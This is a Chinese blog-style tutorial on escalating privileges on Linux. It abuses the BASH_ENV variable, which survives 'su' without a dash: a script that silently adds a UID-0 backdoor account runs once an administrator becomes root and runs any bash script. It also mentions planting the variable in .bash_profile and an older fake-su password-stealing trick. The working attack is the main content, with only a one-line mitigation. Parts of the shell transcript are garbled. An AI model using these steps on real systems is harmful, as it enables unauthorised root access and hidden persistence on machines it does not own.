Linux的提权技巧Linux的提权技巧

关于Linux的提权技巧是不是有很多的小伙伴们不了解呢?

今天小编在文中将为大家介绍一个Linux提权用的技巧,感兴趣的小伙伴们一起跟小编去学习具体方法吧。
OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
一个test:
以下是引用片段:
[xiaoyu@localdomain ~]$ echo B A S H E N V [ x i a o y u @ l o c a l d o m a i n   ] BASH_ENV [xiaoyu@localdomain ~] BASHENV[xiaoyu@localdomain ] export BASH_ENV="/tmp/.bashrc"
[xiaoyu@localdomain ~]$ echo B A S H E N V / t m p / . b a s h r c [ x i a o y u @ l o c a l d o m a i n   ] BASH_ENV /tmp/.bashrc [xiaoyu@localdomain ~] BASHENV/tmp/.bashrc[xiaoyu@localdomain ] cat /tmp/.bashrc
#!/bin/bash
echo “Hello”
[xiaoyu@localdomain ~]$ ls -l
-rwxrwxr-x 1 xiaoyu xiaoyu 22 2008-09-11 05:54 test.sh

[xiaoyu@localdomain ~]$ cat test.sh
#!/bin/bash
echo “kk”
[xiaoyu@localdomain ~]$ ./test.sh
Hello
kk

恩,很好,和我们预期的一样。看看我们怎么利用。

grep su ~/.bash_history
显示此用户有使用su登录root账户的特殊癖好/Article/UploadFiles/200809/20080912102542241.gif。以前我们遇到这种情况通常就是塞个fakesu.c进去。然后修改.bash_profile,建立个别名之类的东西。通过getpass来获得root密码,记录,然后去除别名…关键是管理员使用正确密码登录的时候也是会提示一次密码错误。遇到傻点的管理员可能就放过这个细节了,再输入一遍密码就OK了。但是某些非人类admin会以最快的速度检查系统被入侵的迹象,外加啥啥啥,而且这种管理员改 root密码几乎是肯定的了。所以偷取下来的密码也没啥用处。恩,聪明的X客们一定知道我要做什么了。呵呵,先看看环境变量su后在不
以下是引用片段:
[xiaoyu@localdomain ~]$ echo B A S H E N V / t m p / . b a s h r c [ x i a o y u @ l o c a l d o m a i n   ] BASH_ENV /tmp/.bashrc [xiaoyu@localdomain ~] BASHENV/tmp/.bashrc[xiaoyu@localdomain ] su
Password:
[root@localdomain xiaoyu]# echo $BASH_ENV
/tmp/.bashrc

啊哦,还在/Article/UploadFiles/200809/20080912102542241.gif,OK,实验结束,实战:
以下是引用片段:
[xiaoyu@localdomain tmp]$ echo ’/usr/sbin/useradd -u 0 -o kk 2> /dev/null’ > /tmp/.bashrc
[xiaoyu@localdomain tmp]$ cat /tmp/.bashrc
/usr/sbin/useradd -u 0 -o kk 2> /dev/null
[xiaoyu@localdomain tmp]$ grep kk /etc/passwd
[xiaoyu@localdomain tmp]$ echo B A S H E N V / t m p / . b a s h r c [ x i a o y u @ l o c a l d o m a i n t m p ] BASH_ENV /tmp/.bashrc [xiaoyu@localdomain tmp] BASHENV/tmp/.bashrc[xiaoyu@localdomaintmp] su
Password:
[root@localdomain tmp]# cd /home/xiaoyu
[root@localdomain xiaoyu]# ./test.sh
kk
[root@localdomain xiaoyu]# grep kk /etc/passwd
kk❌0:503::/home/kk:/bin/bash
[root@localdomain xiaoyu]#
呵呵,改密码的语句我没加进去哦。自己想,呵呵,偶不知道,偶不知道
恩,关于怎么安置,和fakesu一样,在.bash_profile等地方export BASH_ENV变量。
如果要避免这种情况,使用su -登录root,估计没几个管理员记得这个指令吧。

Linux的提权技巧就为大家介绍到这来了,Linux的相关知识也是相当的多,希望自己能在不断的学习中,不断的总结,使自己的学习能力和学习效率能有一定的提高。

需要服务器可以找我哟!

你可能感兴趣的:(服务器,Linux)